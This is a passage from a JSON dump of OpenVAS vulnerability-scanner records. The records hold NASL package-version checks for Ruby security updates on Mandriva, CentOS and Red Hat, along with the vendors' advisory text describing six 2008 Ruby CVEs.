"http://plugins.openvas.org/nasl.php?oid=1361412562310830489", "type": "openvas", "title": "Mandriva Update for ruby MDVSA-2008:226 (ruby)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for ruby MDVSA-2008:226 (ruby)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A denial of service condition was found in Ruby's regular expression\n engine. If a Ruby script tried to process a large amount of data\n via a regular expression, it could cause Ruby to enter an infinite\n loop and crash (CVE-2008-3443).\n\n A number of flaws were found in Ruby that could allow an attacker to\n create a carefully crafted script that could allow for the bypass of\n certain safe-level restrictions (CVE-2008-3655).\n \n A denial of service vulnerability was found in Ruby's HTTP server\n toolkit, WEBrick. A remote attacker could send a specially-crafted\n HTTP request to a WEBrick server that would cause it to use an\n excessive amount of CPU time (CVE-2008-3656).\n \n An insufficient taintness check issue was found in Ruby's DL module,\n a module that provides direct access to the C language functions.\n This flaw could be used by an attacker to bypass intended safe-level\n restrictions by calling external C functions with the arguments from\n an untrusted tainted input (CVE-2008-3657).\n \n A denial of service condition in Ruby's XML document parsing module\n (REXML) could cause a Ruby application using the REXML module to use\n an excessive amount of CPU and memory via XML documents with large\n XML entity definitions recursion (CVE-2008-3790).\n \n The Ruby DNS resolver library used predictable transaction IDs and\n a fixed source port when sending DNS requests. This could be used\n by a remote attacker to spoof a malicious reply to a DNS query\n (CVE-2008-3905).\n \n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"ruby on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-11/msg00002.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830489\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:226\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"Mandriva Update for ruby MDVSA-2008:226 (ruby)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tk\", rpm:\"ruby-tk~1.8.6~5.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-doc\", rpm:\"ruby-doc~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tk\", rpm:\"ruby-tk~1.8.6~9p114.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880070", "href": "http://plugins.openvas.org/nasl.php?oid=880070", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0897 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0897 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\");\n script_id(880070);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0897\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0897 centos4 x86_64\");\n\n script_summary(\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870035", "href": "http://plugins.openvas.org/nasl.php?oid=870035", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0897-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0897-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00012.html\");\n script_id(870035);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0897-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0897-01\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870035", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870035", "type": "openvas", "title": "RedHat Update for ruby RHSA-2008:0897-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0897-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n Ruby's XML document parsing module (REXML) was prone to a denial of service\n attack via XML documents with large XML entity definitions recursion. A\n specially-crafted XML file could cause a Ruby application using the REXML\n module to use an excessive amount of CPU and memory. (CVE-2008-3790)\n \n An insufficient "taintness" check flaw was discovered in Ruby's DL module,\n which provides direct access to the C language functions. An attacker could\n use this flaw to bypass intended safe-level restrictions by calling\n external C functions with the arguments from an untrusted tainted inputs.\n (CVE-2008-3657)\n \n A denial of service flaw was discovered in WEBrick, Ruby's HTTP server\n toolkit. A remote attacker could send a specially-crafted HTTP request to a\n WEBrick server that would cause the server to use an excessive amount of\n CPU time. (CVE-2008-3656)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00012.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870035\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0897-01\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\");\n script_name( \"RedHat Update for ruby RHSA-2008:0897-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~5.el5_2.5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~7.el4_7.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880222", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880222", "type": "openvas", "title": "CentOS Update for irb CESA-2008:0897 centos4 i386", "sourceData": "###############################################################################\n# 